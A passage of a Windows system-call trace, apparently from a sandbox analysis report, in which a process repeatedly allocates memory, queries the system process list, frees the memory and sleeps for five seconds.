SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.534] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.560] 